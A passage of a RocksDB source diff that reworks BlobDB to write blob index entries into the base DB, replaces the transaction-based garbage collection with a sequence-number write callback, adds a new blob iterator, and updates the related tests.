range_del_agg, seq, read_opts); + range_del_agg, seq, read_opts, is_blob_index); } bool MemTableListVersion::GetFromList( diff --git a/db/memtable_list.h b/db/memtable_list.h index 23b5bbe558b..69038af5004 100644 --- a/db/memtable_list.h +++ b/db/memtable_list.h @@ -72,14 +72,16 @@ class MemTableListVersion { bool GetFromHistory(const LookupKey& key, std::string* value, Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg, SequenceNumber* seq, - const ReadOptions& read_opts); + const ReadOptions& read_opts, + bool* is_blob_index = nullptr); bool GetFromHistory(const LookupKey& key, std::string* value, Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg, - const ReadOptions& read_opts) { + const ReadOptions& read_opts, 
+ bool* is_blob_index = nullptr) { SequenceNumber seq; return GetFromHistory(key, value, s, merge_context, range_del_agg, &seq, - read_opts); + read_opts, is_blob_index); } Status AddRangeTombstoneIterators(const ReadOptions& read_opts, Arena* arena, diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index f6c6dc6e2bc..f6bc50cd206 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -32,8 +32,7 @@ #include "util/random.h" #include "util/sync_point.h" #include "util/timer_queue.h" -#include "utilities/transactions/optimistic_transaction.h" -#include "utilities/transactions/optimistic_transaction_db_impl.h" +#include "utilities/blob_db/blob_db_iterator.h" namespace { int kBlockBasedTableVersionFormat = 2; @@ -78,7 +77,7 @@ class BlobHandle { void EncodeTo(std::string* dst) const; - Status DecodeFrom(Slice* input); + Status DecodeFrom(const Slice& input); void clear(); @@ -109,10 +108,12 @@ void BlobHandle::clear() { compression_ = kNoCompression; } -Status BlobHandle::DecodeFrom(Slice* input) { - if (GetVarint64(input, &file_number_) && GetVarint64(input, &offset_) && - GetVarint64(input, &size_)) { - compression_ = static_cast(input->data()[0]); +Status BlobHandle::DecodeFrom(const Slice& input) { + Slice s(input); + Slice* p = &s; + if (GetVarint64(p, &file_number_) && GetVarint64(p, &offset_) && + GetVarint64(p, &size_)) { + compression_ = static_cast(p->data()[0]); return Status::OK(); } else { clear(); @@ -149,8 +150,7 @@ void EvictAllVersionsCompactionListener::InternalListener::OnCompaction( value_type == CompactionEventListener::CompactionListenerValueType::kValue) { BlobHandle handle; - Slice lsmval(existing_value); - Status s = handle.DecodeFrom(&lsmval); + Status s = handle.DecodeFrom(existing_value); if (s.ok()) { if (impl_->debug_level_ >= 3) ROCKS_LOG_INFO(impl_->db_options_.info_log, @@ -211,8 +211,6 @@ Status BlobDBImpl::LinkToBaseDB(DB* db) { env_ = db_->GetEnv(); - opt_db_.reset(new OptimisticTransactionDBImpl(db, false)); - Status s = env_->CreateDirIfMissing(blob_dir_); if (!s.ok()) { ROCKS_LOG_WARN(db_options_.info_log, @@ -237,7 +235,6 @@ BlobDBOptions BlobDBImpl::GetBlobDBOptions() const { return bdb_options_; } BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options) : BlobDB(db), db_impl_(static_cast_with_check(db)), - opt_db_(new OptimisticTransactionDBImpl(db, false)), wo_set_(false), bdb_options_(blob_db_options), db_options_(db->GetOptions()), @@ -827,8 +824,8 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { extendTTL(&(bfile->ttl_range_), expiration); } - return WriteBatchInternal::Put(&updates_blob_, column_family_id, key, - index_entry); + return WriteBatchInternal::PutBlobIndex(&updates_blob_, column_family_id, + key, index_entry); } virtual Status DeleteCF(uint32_t column_family_id, @@ -997,18 +994,6 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, std::string headerbuf; Writer::ConstructBlobHeader(&headerbuf, key, value, expiration, -1); - // this is another more safer way to do it, where you keep the writeLock - // for the entire write path. 
this will increase latency and reduce - // throughput - // WriteLock lockbfile_w(&bfile->mutex_); - // std::shared_ptr writer = - // CheckOrCreateWriterLocked(bfile); - - if (debug_level_ >= 3) - ROCKS_LOG_DEBUG( - db_options_.info_log, ">Adding KEY FILE: %s: KEY: %s VALSZ: %d", - bfile->PathName().c_str(), key.ToString().c_str(), value.size()); - std::string index_entry; Status s = AppendBlob(bfile, headerbuf, key, value, &index_entry); if (!s.ok()) { @@ -1022,20 +1007,25 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, } WriteBatch batch; - batch.Put(key, index_entry); + uint32_t column_family_id = + reinterpret_cast(DefaultColumnFamily())->GetID(); + s = WriteBatchInternal::PutBlobIndex(&batch, column_family_id, key, + index_entry); // this goes to the base db and can be expensive - s = db_->Write(options, &batch); - - // this is the sequence number of the write. - SequenceNumber sn = WriteBatchInternal::Sequence(&batch); - bfile->ExtendSequenceRange(sn); - - if (expiration != kNoExpiration) { - extendTTL(&(bfile->ttl_range_), expiration); + if (s.ok()) { + s = db_->Write(options, &batch); } if (s.ok()) { + // this is the sequence number of the write. + SequenceNumber sn = WriteBatchInternal::Sequence(&batch); + bfile->ExtendSequenceRange(sn); + + if (expiration != kNoExpiration) { + extendTTL(&(bfile->ttl_range_), expiration); + } + s = CloseBlobFileIfNeeded(bfile); } @@ -1112,21 +1102,16 @@ std::vector BlobDBImpl::MultiGet( // fetch and index entry and reading from the file. ReadOptions ro(read_options); bool snapshot_created = SetSnapshotIfNeeded(&ro); - std::vector values_lsm; - values_lsm.resize(keys.size()); - auto statuses = db_->MultiGet(ro, keys, &values_lsm); - TEST_SYNC_POINT("BlobDBImpl::MultiGet:AfterIndexEntryGet:1"); - TEST_SYNC_POINT("BlobDBImpl::MultiGet:AfterIndexEntryGet:2"); - - values->resize(keys.size()); - assert(statuses.size() == keys.size()); - assert(values_lsm.size() == keys.size()); - for (size_t i = 0; i < keys.size(); ++i) { - if (!statuses[i].ok()) { - continue; - } - Status s = CommonGet(keys[i], values_lsm[i], &((*values)[i])); - statuses[i] = s; + + std::vector statuses; + statuses.reserve(keys.size()); + values->clear(); + values->reserve(keys.size()); + PinnableSlice value; + for (size_t i = 0; i < keys.size(); i++) { + statuses.push_back(Get(ro, DefaultColumnFamily(), keys[i], &value)); + values->push_back(value.ToString()); + value.Reset(); } if (snapshot_created) { db_->ReleaseSnapshot(ro.snapshot); @@ -1143,12 +1128,11 @@ bool BlobDBImpl::SetSnapshotIfNeeded(ReadOptions* read_options) { return true; } -Status BlobDBImpl::CommonGet(const Slice& key, const std::string& index_entry, - std::string* value) { +Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, + PinnableSlice* value) { assert(value != nullptr); - Slice index_entry_slice(index_entry); BlobHandle handle; - Status s = handle.DecodeFrom(&index_entry_slice); + Status s = handle.DecodeFrom(index_entry); if (!s.ok()) return s; // offset has to have certain min, as we will read CRC @@ -1179,9 +1163,8 @@ Status BlobDBImpl::CommonGet(const Slice& key, const std::string& index_entry, bfile = hitr->second; } - // 0 - size - if (!handle.size() && value != nullptr) { - value->clear(); + if (handle.size() == 0 && value != nullptr) { + value->PinSelf(""); return Status::OK(); } @@ -1189,7 +1172,7 @@ Status BlobDBImpl::CommonGet(const Slice& key, const std::string& index_entry, std::shared_ptr reader = GetOrOpenRandomAccessReader(bfile, env_, 
env_options_); - std::string* valueptr = value; + std::string* valueptr = value->GetSelf(); std::string value_c; if (bdb_options_.compression != kNoCompression) { valueptr = &value_c; @@ -1251,9 +1234,11 @@ Status BlobDBImpl::CommonGet(const Slice& key, const std::string& index_entry, blob_value.data(), blob_value.size(), &contents, kBlockBasedTableVersionFormat, Slice(), bdb_options_.compression, *(cfh->cfd()->ioptions())); - *value = contents.data.ToString(); + *(value->GetSelf()) = contents.data.ToString(); } + value->PinSelf(); + return s; } @@ -1271,13 +1256,16 @@ Status BlobDBImpl::Get(const ReadOptions& read_options, bool snapshot_created = SetSnapshotIfNeeded(&ro); Status s; - std::string index_entry; - s = db_->Get(ro, key, &index_entry); + bool is_blob_index = false; + s = db_impl_->GetImpl(ro, column_family, key, value, nullptr /*value_found*/, + &is_blob_index); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:1"); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:2"); if (s.ok()) { - s = CommonGet(key, index_entry, value->GetSelf()); - value->PinSelf(); + if (is_blob_index) { + PinnableSlice index_entry = std::move(*value); + s = GetBlobValue(key, index_entry, value); + } } if (snapshot_created) { db_->ReleaseSnapshot(ro.snapshot); @@ -1285,15 +1273,6 @@ Status BlobDBImpl::Get(const ReadOptions& read_options, return s; } -Slice BlobDBIterator::value() const { - TEST_SYNC_POINT("BlobDBIterator::value:BeforeGetBlob:1"); - TEST_SYNC_POINT("BlobDBIterator::value:BeforeGetBlob:2"); - Slice index_entry = iter_->value(); - Status s = - db_impl_->CommonGet(iter_->key(), index_entry.ToString(false), &vpart_); - return Slice(vpart_); -} - std::pair BlobDBImpl::SanityCheck(bool aborted) { if (aborted) return std::make_pair(false, -1); @@ -1411,14 +1390,13 @@ bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, return true; } -bool BlobDBImpl::MarkBlobDeleted(const Slice& key, const Slice& lsmValue) { - Slice val(lsmValue); +bool BlobDBImpl::MarkBlobDeleted(const Slice& key, const Slice& index_entry) { BlobHandle handle; - Status s = handle.DecodeFrom(&val); + Status s = handle.DecodeFrom(index_entry); if (!s.ok()) { ROCKS_LOG_INFO(db_options_.info_log, "Could not parse lsm val in MarkBlobDeleted %s", - lsmValue.ToString().c_str()); + index_entry.ToString().c_str()); return false; } bool succ = FindFileAndEvictABlob(handle.filenumber(), key.size(), @@ -1618,7 +1596,52 @@ std::pair BlobDBImpl::WaStats(bool aborted) { return std::make_pair(true, -1); } -//////////////////////////////////////////////////////////////////////////////// +// Write callback for garbage collection to check if key has been updated +// since last read. Similar to how OptimisticTransaction works. See inline +// comment in GCFileAndUpdateLSM(). +class BlobDBImpl::GarbageCollectionWriteCallback : public WriteCallback { + public: + GarbageCollectionWriteCallback(ColumnFamilyData* cfd, const Slice& key, + SequenceNumber upper_bound) + : cfd_(cfd), key_(key), upper_bound_(upper_bound) {} + + virtual Status Callback(DB* db) override { + auto* db_impl = reinterpret_cast(db); + auto* sv = db_impl->GetAndRefSuperVersion(cfd_); + SequenceNumber latest_seq = 0; + bool found_record_for_key = false; + bool is_blob_index = false; + Status s = db_impl->GetLatestSequenceForKey( + sv, key_, false /*cache_only*/, &latest_seq, &found_record_for_key, + &is_blob_index); + db_impl->ReturnAndCleanupSuperVersion(cfd_, sv); + if (!s.ok() && !s.IsNotFound()) { + // Error. 
+ assert(!s.IsBusy()); + return s; + } + if (s.IsNotFound()) { + assert(!found_record_for_key); + return Status::Busy("Key deleted"); + } + assert(found_record_for_key); + assert(is_blob_index); + if (latest_seq > upper_bound_) { + return Status::Busy("Key overwritten"); + } + return s; + } + + virtual bool AllowWriteBatching() override { return false; } + + private: + ColumnFamilyData* cfd_; + // Key to check + Slice key_; + // Upper bound of sequence number to proceed. + SequenceNumber upper_bound_; +}; + // iterate over the blobs sequentially and check if the blob sequence number // is the latest. If it is the latest, preserve it, otherwise delete it // if it is TTL based, and the TTL has expired, then @@ -1631,7 +1654,6 @@ std::pair BlobDBImpl::WaStats(bool aborted) { // // if it is not TTL based, then we can blow the key if the key has been // DELETED in the LSM -//////////////////////////////////////////////////////////////////////////////// Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, GCStats* gc_stats) { uint64_t now = EpochNow(); @@ -1656,14 +1678,14 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, bool first_gc = bfptr->gc_once_after_open_; - ColumnFamilyHandle* cfh = bfptr->GetColumnFamily(db_); + auto* cfh = bfptr->GetColumnFamily(db_); + auto* cfd = reinterpret_cast(cfh)->cfd(); + auto column_family_id = cfd->GetID(); bool has_ttl = header.HasTTL(); // this reads the key but skips the blob Reader::ReadLevel shallow = Reader::kReadHeaderKey; - assert(opt_db_); - bool no_relocation_ttl = (has_ttl && now >= bfptr->GetTTLRange().second); bool no_relocation_lsmdel = false; @@ -1683,59 +1705,52 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, BlobLogRecord record; std::shared_ptr newfile; std::shared_ptr new_writer; - Transaction* transaction = nullptr; uint64_t blob_offset = 0; - bool retry = false; - - static const WriteOptions kGarbageCollectionWriteOptions = []() { - WriteOptions write_options; - // It is ok to ignore column families that were dropped. - write_options.ignore_missing_column_families = true; - return write_options; - }(); while (true) { assert(s.ok()); - if (retry) { - // Retry in case transaction fail with Status::TryAgain. - retry = false; - } else { - // Read the next blob record. - Status read_record_status = - reader->ReadRecord(&record, shallow, &blob_offset); - // Exit if we reach the end of blob file. - // TODO(yiwu): properly handle ReadRecord error. - if (!read_record_status.ok()) { - break; - } - gc_stats->blob_count++; - } - transaction = - opt_db_->BeginTransaction(kGarbageCollectionWriteOptions, - OptimisticTransactionOptions(), transaction); - - std::string index_entry; - Status get_status = transaction->GetForUpdate(ReadOptions(), cfh, - record.Key(), &index_entry); - TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate"); - if (get_status.IsNotFound()) { - // Key has been deleted. Drop the blob record. - continue; + // Read the next blob record. + Status read_record_status = + reader->ReadRecord(&record, shallow, &blob_offset); + // Exit if we reach the end of blob file. + // TODO(yiwu): properly handle ReadRecord error. + if (!read_record_status.ok()) { + break; } - if (!get_status.ok()) { + gc_stats->blob_count++; + + // Similar to OptimisticTransaction, we obtain latest_seq from + // base DB, which is guaranteed to be no smaller than the sequence of + // current key. We use a WriteCallback on write to check the key sequence + // on write. 
If the key sequence is larger than latest_seq, we know + a new version is inserted and the old blob can be discarded. + // + // We cannot use OptimisticTransaction because we need to pass + // is_blob_index flag to GetImpl. + SequenceNumber latest_seq = GetLatestSequenceNumber(); + bool is_blob_index = false; + PinnableSlice index_entry; + Status get_status = db_impl_->GetImpl( + ReadOptions(), cfh, record.Key(), &index_entry, nullptr /*value_found*/, + &is_blob_index); + TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB"); + if (!get_status.ok() && !get_status.IsNotFound()) { + // error s = get_status; ROCKS_LOG_ERROR(db_options_.info_log, "Error while getting index entry: %s", s.ToString().c_str()); break; } + if (get_status.IsNotFound() || !is_blob_index) { + // Either the key is deleted or updated with a newer version which is + // inlined in LSM. + continue; + } - // TODO(yiwu): We should have an override of GetForUpdate returning a - // PinnableSlice. - Slice index_entry_slice(index_entry); BlobHandle handle; - s = handle.DecodeFrom(&index_entry_slice); + s = handle.DecodeFrom(index_entry); if (!s.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, "Error while decoding index entry: %s", @@ -1748,21 +1763,24 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr, continue; } + GarbageCollectionWriteCallback callback(cfd, record.Key(), latest_seq); + // If key has expired, remove it from base DB. if (no_relocation_ttl || (has_ttl && now >= record.GetTTL())) { gc_stats->num_deletes++; gc_stats->deleted_size += record.GetBlobSize(); TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"); - transaction->Delete(cfh, record.Key()); - Status delete_status = transaction->Commit(); + WriteBatch delete_batch; + Status delete_status = delete_batch.Delete(record.Key()); + if (delete_status.ok()) { + delete_status = db_impl_->WriteWithCallback(WriteOptions(), + &delete_batch, &callback); + } if (delete_status.ok()) { gc_stats->delete_succeeded++; } else if (delete_status.IsBusy()) { // The key is overwritten in the meantime. Drop the blob record. gc_stats->overwritten_while_delete++; - } else if (delete_status.IsTryAgain()) { - // Retry the transaction. - retry = true; } else { // We hit an error. s = delete_status; @@ -1829,29 +1847,27 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr, BlobLogRecord::kHeaderSize + record.Key().size() + record.Blob().size(); TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"); - transaction->Put(cfh, record.Key(), new_index_entry); - Status put_status = transaction->Commit(); - if (put_status.ok()) { + WriteBatch rewrite_batch; + Status rewrite_status = WriteBatchInternal::PutBlobIndex( + &rewrite_batch, column_family_id, record.Key(), new_index_entry); + if (rewrite_status.ok()) { + rewrite_status = db_impl_->WriteWithCallback(WriteOptions(), + &rewrite_batch, &callback); + } + if (rewrite_status.ok()) { gc_stats->relocate_succeeded++; - } else if (put_status.IsBusy()) { + } else if (rewrite_status.IsBusy()) { // The key is overwritten in the meantime. Drop the blob record. gc_stats->overwritten_while_relocate++; - } else if (put_status.IsTryAgain()) { - // Retry the transaction. - // TODO(yiwu): On retry, we can reuse the new blob record. - retry = true; } else { // We hit an error.
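For readers who have not met WriteWithCallback: it runs a caller-supplied check under the DB's write lock, which is what makes the read-check-write sequence in this hunk atomic. A minimal sketch of such a callback follows; it is illustrative only, not part of the patch, and it checks the DB-wide latest sequence number, which is coarser than the per-key GetLatestSequenceForKey check that GarbageCollectionWriteCallback performs:

    #include "db/write_callback.h"
    #include "rocksdb/db.h"

    // Sketch: abort a write if anything was committed after expected_seq.
    class SequenceGuard : public rocksdb::WriteCallback {
     public:
      explicit SequenceGuard(rocksdb::SequenceNumber expected_seq)
          : expected_seq_(expected_seq) {}

      // Runs just before the batch is applied; returning non-OK aborts the
      // write. Status::Busy() is what the GC code above interprets as "key
      // overwritten; drop the blob record" rather than a hard error.
      rocksdb::Status Callback(rocksdb::DB* db) override {
        if (db->GetLatestSequenceNumber() > expected_seq_) {
          return rocksdb::Status::Busy("updated since read");
        }
        return rocksdb::Status::OK();
      }

      // Disallow batching so no unrelated write can commit under this check.
      bool AllowWriteBatching() override { return false; }

     private:
      rocksdb::SequenceNumber expected_seq_;
    };

A batch would then be committed with db_impl_->WriteWithCallback(WriteOptions(), &batch, &guard), exactly as the delete and relocate paths above do.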
- s = put_status; + s = rewrite_status; ROCKS_LOG_ERROR(db_options_.info_log, "Error while relocating key: %s", s.ToString().c_str()); break; } } // end of ReadRecord loop - if (transaction != nullptr) { - delete transaction; - } ROCKS_LOG_INFO( db_options_.info_log, "%s blob file %" PRIu64 @@ -2195,12 +2211,20 @@ std::pair BlobDBImpl::RunGC(bool aborted) { } Iterator* BlobDBImpl::NewIterator(const ReadOptions& read_options) { + auto* cfd = + reinterpret_cast(DefaultColumnFamily())->cfd(); // Get a snapshot to avoid blob file get deleted between we // fetch and index entry and reading from the file. - ReadOptions ro(read_options); - bool snapshot_created = SetSnapshotIfNeeded(&ro); - return new BlobDBIterator(db_->NewIterator(ro), this, snapshot_created, - ro.snapshot); + ManagedSnapshot* own_snapshot = nullptr; + const Snapshot* snapshot = read_options.snapshot; + if (snapshot == nullptr) { + own_snapshot = new ManagedSnapshot(db_); + snapshot = own_snapshot->snapshot(); + } + auto* iter = db_impl_->NewIteratorImpl( + read_options, cfd, snapshot->GetSequenceNumber(), + true /*allow_blob*/); + return new BlobDBIterator(own_snapshot, iter, this); } Status DestroyBlobDB(const std::string& dbname, const Options& options, diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 5654d05e569..6496c585d34 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -18,6 +18,7 @@ #include #include +#include "db/db_iter.h" #include "rocksdb/compaction_filter.h" #include "rocksdb/db.h" #include "rocksdb/listener.h" @@ -37,7 +38,6 @@ namespace rocksdb { class DBImpl; class ColumnFamilyHandle; class ColumnFamilyData; -class OptimisticTransactionDBImpl; struct FlushJobInfo; namespace blob_db { @@ -215,9 +215,20 @@ class BlobDBImpl : public BlobDB { Status Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value) override; + Status GetBlobValue(const Slice& key, const Slice& index_entry, + PinnableSlice* value); + using BlobDB::NewIterator; virtual Iterator* NewIterator(const ReadOptions& read_options) override; + using BlobDB::NewIterators; + virtual Status NewIterators( + const ReadOptions& read_options, + const std::vector& column_families, + std::vector* iterators) override { + return Status::NotSupported("Not implemented"); + } + using BlobDB::MultiGet; virtual std::vector MultiGet( const ReadOptions& read_options, @@ -269,15 +280,14 @@ class BlobDBImpl : public BlobDB { #endif // !NDEBUG private: + class GarbageCollectionWriteCallback; + Status OpenPhase1(); // Create a snapshot if there isn't one in read options. // Return true if a snapshot is created. 
bool SetSnapshotIfNeeded(ReadOptions* read_options); - Status CommonGet(const Slice& key, const std::string& index_entry, - std::string* value); - Slice GetCompressedSlice(const Slice& raw, std::string* compression_output) const; @@ -416,10 +426,6 @@ class BlobDBImpl : public BlobDB { Env* env_; TTLExtractor* ttl_extractor_; - // Optimistic Transaction DB used during Garbage collection - // for atomicity - std::unique_ptr opt_db_; - // a boolean to capture whether write_options has been set std::atomic wo_set_; WriteOptions write_options_; @@ -527,55 +533,6 @@ class BlobDBImpl : public BlobDB { uint32_t debug_level_; }; -class BlobDBIterator : public Iterator { - public: - explicit BlobDBIterator(Iterator* iter, BlobDBImpl* impl, bool own_snapshot, - const Snapshot* snapshot) - : iter_(iter), - db_impl_(impl), - own_snapshot_(own_snapshot), - snapshot_(snapshot) { - assert(iter != nullptr); - assert(snapshot != nullptr); - } - - ~BlobDBIterator() { - if (own_snapshot_) { - db_impl_->ReleaseSnapshot(snapshot_); - } - delete iter_; - } - - bool Valid() const override { return iter_->Valid(); } - - void SeekToFirst() override { iter_->SeekToFirst(); } - - void SeekToLast() override { iter_->SeekToLast(); } - - void Seek(const Slice& target) override { iter_->Seek(target); } - - void SeekForPrev(const Slice& target) override { iter_->SeekForPrev(target); } - - void Next() override { iter_->Next(); } - - void Prev() override { iter_->Prev(); } - - Slice key() const override { return iter_->key(); } - - Slice value() const override; - - Status status() const override { return iter_->status(); } - - // Iterator::Refresh() not supported. - - private: - Iterator* iter_; - BlobDBImpl* db_impl_; - bool own_snapshot_; - const Snapshot* snapshot_; - mutable std::string vpart_; -}; - } // namespace blob_db } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/blob_db/blob_db_iterator.h b/utilities/blob_db/blob_db_iterator.h new file mode 100644 index 00000000000..c8aa1ff17ec --- /dev/null +++ b/utilities/blob_db/blob_db_iterator.h @@ -0,0 +1,104 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
+ +#pragma once +#ifndef ROCKSDB_LITE + +#include "rocksdb/iterator.h" +#include "utilities/blob_db/blob_db_impl.h" + +namespace rocksdb { +namespace blob_db { + +using rocksdb::ManagedSnapshot; + +class BlobDBIterator : public Iterator { + public: + BlobDBIterator(ManagedSnapshot* snapshot, ArenaWrappedDBIter* iter, + BlobDBImpl* blob_db) + : snapshot_(snapshot), iter_(iter), blob_db_(blob_db) {} + + virtual ~BlobDBIterator() = default; + + bool Valid() const override { + if (!iter_->Valid()) { + return false; + } + return status_.ok(); + } + + Status status() const override { + if (!iter_->status().ok()) { + return iter_->status(); + } + return status_; + } + + void SeekToFirst() override { + iter_->SeekToFirst(); + UpdateBlobValue(); + } + + void SeekToLast() override { + iter_->SeekToLast(); + UpdateBlobValue(); + } + + void Seek(const Slice& target) override { + iter_->Seek(target); + UpdateBlobValue(); + } + + void SeekForPrev(const Slice& target) override { + iter_->SeekForPrev(target); + UpdateBlobValue(); + } + + void Next() override { + assert(Valid()); + iter_->Next(); + UpdateBlobValue(); + } + + void Prev() override { + assert(Valid()); + iter_->Prev(); + UpdateBlobValue(); + } + + Slice key() const override { + assert(Valid()); + return iter_->key(); + } + + Slice value() const override { + assert(Valid()); + if (!iter_->IsBlob()) { + return iter_->value(); + } + return value_; + } + + // Iterator::Refresh() not supported. + + private: + void UpdateBlobValue() { + TEST_SYNC_POINT("BlobDBIterator::UpdateBlobValue:Start:1"); + TEST_SYNC_POINT("BlobDBIterator::UpdateBlobValue:Start:2"); + value_.Reset(); + if (iter_->Valid() && iter_->IsBlob()) { + status_ = blob_db_->GetBlobValue(iter_->key(), iter_->value(), &value_); + } + } + + std::unique_ptr<ManagedSnapshot> snapshot_; + std::unique_ptr<ArenaWrappedDBIter> iter_; + BlobDBImpl* blob_db_; + Status status_; + PinnableSlice value_; +}; +} // namespace blob_db +} // namespace rocksdb +#endif // !ROCKSDB_LITE diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 5c15041e2da..b4907eef1fd 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -76,9 +76,14 @@ class BlobDBTest : public testing::Test { void PutRandom(const std::string &key, Random *rnd, std::map<std::string, std::string> *data = nullptr) { + PutRandom(blob_db_, key, rnd, data); + } + + void PutRandom(DB *db, const std::string &key, Random *rnd, + std::map<std::string, std::string> *data = nullptr) { int len = rnd->Next() % kMaxBlobSize + 1; std::string value = test::RandomHumanReadableString(rnd, len); - ASSERT_OK(blob_db_->Put(WriteOptions(), Slice(key), Slice(value))); + ASSERT_OK(db->Put(WriteOptions(), Slice(key), Slice(value))); if (data != nullptr) { (*data)[key] = value; } @@ -104,9 +109,12 @@ class BlobDBTest : public testing::Test { } // Verify blob db contains expected data and nothing more. - // TODO(yiwu): Verify blob files are consistent with data in LSM.
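The BlobDBIterator added above resolves blob indirection eagerly on every Seek*/Next/Prev rather than lazily in value(). A minimal usage sketch, assuming an already-open BlobDB* and a hypothetical consumer Process() that is not part of the patch:

    #include <cassert>
    #include <memory>

    #include "rocksdb/iterator.h"
    #include "utilities/blob_db/blob_db.h"

    // Hypothetical consumer; not part of the patch.
    void Process(const rocksdb::Slice& key, const rocksdb::Slice& value);

    void ScanAll(rocksdb::blob_db::BlobDB* bdb) {
      std::unique_ptr<rocksdb::Iterator> it(
          bdb->NewIterator(rocksdb::ReadOptions()));
      for (it->SeekToFirst(); it->Valid(); it->Next()) {
        // value() is either the inline LSM value or the blob already fetched
        // by UpdateBlobValue(); it is ready by the time Valid() returns true.
        Process(it->key(), it->value());
      }
      // A failed blob read makes Valid() return false, so tell end-of-data
      // apart from an error by checking status() after the loop.
      assert(it->status().ok());
    }

Resolving the blob in UpdateBlobValue() rather than in value() keeps value() const and side-effect free, at the cost of fetching blobs even for entries the caller ends up skipping.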
void VerifyDB(const std::map<std::string, std::string> &data) { - Iterator *iter = blob_db_->NewIterator(ReadOptions()); + VerifyDB(blob_db_, data); + } + + void VerifyDB(DB *db, const std::map<std::string, std::string> &data) { + Iterator *iter = db->NewIterator(ReadOptions()); iter->SeekToFirst(); for (auto &p : data) { ASSERT_TRUE(iter->Valid()); @@ -582,7 +590,7 @@ TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); SyncPoint::GetInstance()->LoadDependency( - {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate", + {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB", "BlobDBImpl::PutUntil:Start"}, {"BlobDBImpl::PutUntil:Finish", "BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"}}); @@ -619,7 +627,7 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { mock_env_->set_current_time(300); SyncPoint::GetInstance()->LoadDependency( - {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate", + {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB", "BlobDBImpl::PutUntil:Start"}, {"BlobDBImpl::PutUntil:Finish", "BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"}}); @@ -676,7 +684,7 @@ TEST_F(BlobDBTest, GCOldestSimpleBlobFileWhenOutOfSpace) { TEST_F(BlobDBTest, ReadWhileGC) { // run the same test for Get(), MultiGet() and Iterator each. - for (int i = 0; i < 3; i++) { + for (int i = 0; i < 2; i++) { BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); @@ -699,17 +707,10 @@ TEST_F(BlobDBTest, ReadWhileGC) { break; case 1: SyncPoint::GetInstance()->LoadDependency( - {{"BlobDBImpl::MultiGet:AfterIndexEntryGet:1", + {{"BlobDBIterator::UpdateBlobValue:Start:1", "BlobDBTest::ReadWhileGC:1"}, {"BlobDBTest::ReadWhileGC:2", - "BlobDBImpl::MultiGet:AfterIndexEntryGet:2"}}); - break; - case 2: - SyncPoint::GetInstance()->LoadDependency( - {{"BlobDBIterator::value:BeforeGetBlob:1", - "BlobDBTest::ReadWhileGC:1"}, - {"BlobDBTest::ReadWhileGC:2", - "BlobDBIterator::value:BeforeGetBlob:2"}}); + "BlobDBIterator::UpdateBlobValue:Start:2"}}); break; } SyncPoint::GetInstance()->EnableProcessing(); @@ -724,12 +725,6 @@ TEST_F(BlobDBTest, ReadWhileGC) { ASSERT_EQ("bar", value); break; case 1: - statuses = blob_db_->MultiGet(ReadOptions(), {"foo"}, &values); - ASSERT_EQ(1, statuses.size()); - ASSERT_EQ(1, values.size()); - ASSERT_EQ("bar", values[0]); - break; - case 2: // VerifyDB uses an iterator to scan the DB. VerifyDB({{"foo", "bar"}}); break; @@ -823,6 +818,58 @@ TEST_F(BlobDBTest, GetLiveFilesMetaData) { VerifyDB(data); } +TEST_F(BlobDBTest, MigrateFromPlainRocksDB) { + constexpr size_t kNumKey = 20; + constexpr size_t kNumIteration = 10; + Random rnd(301); + std::map<std::string, std::string> data; + std::vector<bool> is_blob(kNumKey, false); + + // Write to plain rocksdb. + Options options; + options.create_if_missing = true; + DB *db = nullptr; + ASSERT_OK(DB::Open(options, dbname_, &db)); + for (size_t i = 0; i < kNumIteration; i++) { + auto key_index = rnd.Next() % kNumKey; + std::string key 